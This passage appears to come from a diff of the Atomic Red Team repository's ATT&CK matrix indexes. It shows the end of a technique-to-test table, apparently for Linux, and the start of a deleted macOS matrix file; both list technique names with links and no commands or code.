TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | |
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
| | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | | | [Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
| | | | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
| | | | | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | | | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | | | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
atomics/Indexes/Matrices/macos-matrix.md
-106
View File
@@ -1,106 +0,0 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen 